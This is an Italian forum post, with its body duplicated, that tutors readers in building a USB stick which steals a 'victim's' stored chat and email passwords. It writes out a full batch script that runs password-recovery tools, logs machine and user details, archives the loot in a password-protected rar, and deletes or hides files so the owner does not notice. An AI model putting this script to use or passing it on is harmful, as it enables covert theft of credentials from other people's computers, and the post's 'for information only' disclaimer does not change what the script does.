- 15 Gennaio 2008
- 1.144
- 0
- Miglior risposta
- 0
Prima di cominciare voglio chiarire delle cose che il materiale postato in questo topic è a solo scopo informativo quindi ne io ne lo staff del forum ci assumiamo la responsabilità dell'uso che ne farete!!
Occorente:
1.Una "vittima"(
)
2.Una pendrive
3.mspass.exe
4.mailpv.exe
Allora cominciamo con realizzare il file autorun.inf che si occuperà di attivare le funzionalità Autoplay di windows.Il contenuto della chiavetta verrà così caricato automaticamente appena la si collega alla porta USB del PC.Per realizzare il file è sufficente aprire il Blocco Note di windows e creare un documento con il seguente contenuto:
Fatto questo, salviamo il file con Fil/Salva con nome: in Nome File digitiamo autorun.inf e, ne campo Salva con Nome,selezioniamo Tutti i file.
Il file autorun.inf permette di visualizzare un menu di scelta appena la chiavetta USB viene collegata al PC.Cliccando Preleva password verà richiamato il file lancia.bat che avvierà la procedura automatica di copia delle password archiviate nell'Hark Disk.Questo file è il cuore di tutta la chiavetta USB.Il suo funionamento si può demure dal suo codice:
@mspass.exe /sverhtml mspass.html
@mailpv.exe /sverhtml mailpv.html
REM Scrittura del file di log
@echo COMPUTERNAME =
%COMPUTERNAME% > log.txt
@echo USERNAME =
%USERNAME% >> log.txt
@echo USERDOMAIN =
%USERDOMAIN% >> log.txt
@echo USERPROFILE=
%USERPROFILE >> log.txt
@echo.>>log.txt
@echo Oggi e' %DATE%
e sono le %TIME%>> log.txt
REM Compressione
@rar.exe a -pPASSWORD
backup_%random%.rar
*.html log.txt > nul
REM Eliminazione e celamento
dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
In parole povere, quando il file lancia.bat viene avviato, vengono chiamati da linea di comando i programmi mspass.exe e mailpv.exe che si occupano di trovare, rispettivamente, le password dei programmi di chat e di posta elettronica archiviate nel PC. Questi dati vengono poi memorizzati all'interno dei file mspass.html e mailpv.html e nel frattempo viene generato il documento di testo log.txt contenente le informazioni sul PC.
Se la vittima dovesse riuscire ad accedere al contenuto della chiavetta potrebbe scoprire il tentativo di furto dei dati personali.Per evitare ciò, i file contenenti i dati personali che saranno inseriti in un arichivio back_upnumerocasuale.rar (che creerete voi) protetto da una password.
Per non lasciare alcuna traccia del nostro passaggio, il file lancia.bat provvede a cancellare i file HTML e a nascondere l'archivio compresso, in modo da non lasciare tracce visibili ad un "occhio" poco esperto.
Link download di mspass.exe e mailpv.exe
________
Fonte: Mia
Occorente:
1.Una "vittima"(
)2.Una pendrive
3.mspass.exe
4.mailpv.exe
Allora cominciamo con realizzare il file autorun.inf che si occuperà di attivare le funzionalità Autoplay di windows.Il contenuto della chiavetta verrà così caricato automaticamente appena la si collega alla porta USB del PC.Per realizzare il file è sufficente aprire il Blocco Note di windows e creare un documento con il seguente contenuto:
Fatto questo, salviamo il file con Fil/Salva con nome: in Nome File digitiamo autorun.inf e, ne campo Salva con Nome,selezioniamo Tutti i file.
Il file autorun.inf permette di visualizzare un menu di scelta appena la chiavetta USB viene collegata al PC.Cliccando Preleva password verà richiamato il file lancia.bat che avvierà la procedura automatica di copia delle password archiviate nell'Hark Disk.Questo file è il cuore di tutta la chiavetta USB.Il suo funionamento si può demure dal suo codice:
@mspass.exe /sverhtml mspass.html
@mailpv.exe /sverhtml mailpv.html
REM Scrittura del file di log
@echo COMPUTERNAME =
%COMPUTERNAME% > log.txt
@echo USERNAME =
%USERNAME% >> log.txt
@echo USERDOMAIN =
%USERDOMAIN% >> log.txt
@echo USERPROFILE=
%USERPROFILE >> log.txt
@echo.>>log.txt
@echo Oggi e' %DATE%
e sono le %TIME%>> log.txt
REM Compressione
@rar.exe a -pPASSWORD
backup_%random%.rar
*.html log.txt > nul
REM Eliminazione e celamento
dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
In parole povere, quando il file lancia.bat viene avviato, vengono chiamati da linea di comando i programmi mspass.exe e mailpv.exe che si occupano di trovare, rispettivamente, le password dei programmi di chat e di posta elettronica archiviate nel PC. Questi dati vengono poi memorizzati all'interno dei file mspass.html e mailpv.html e nel frattempo viene generato il documento di testo log.txt contenente le informazioni sul PC.
Se la vittima dovesse riuscire ad accedere al contenuto della chiavetta potrebbe scoprire il tentativo di furto dei dati personali.Per evitare ciò, i file contenenti i dati personali che saranno inseriti in un arichivio back_upnumerocasuale.rar (che creerete voi) protetto da una password.
Per non lasciare alcuna traccia del nostro passaggio, il file lancia.bat provvede a cancellare i file HTML e a nascondere l'archivio compresso, in modo da non lasciare tracce visibili ad un "occhio" poco esperto.
Link download di mspass.exe e mailpv.exe
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
________
Fonte: Mia
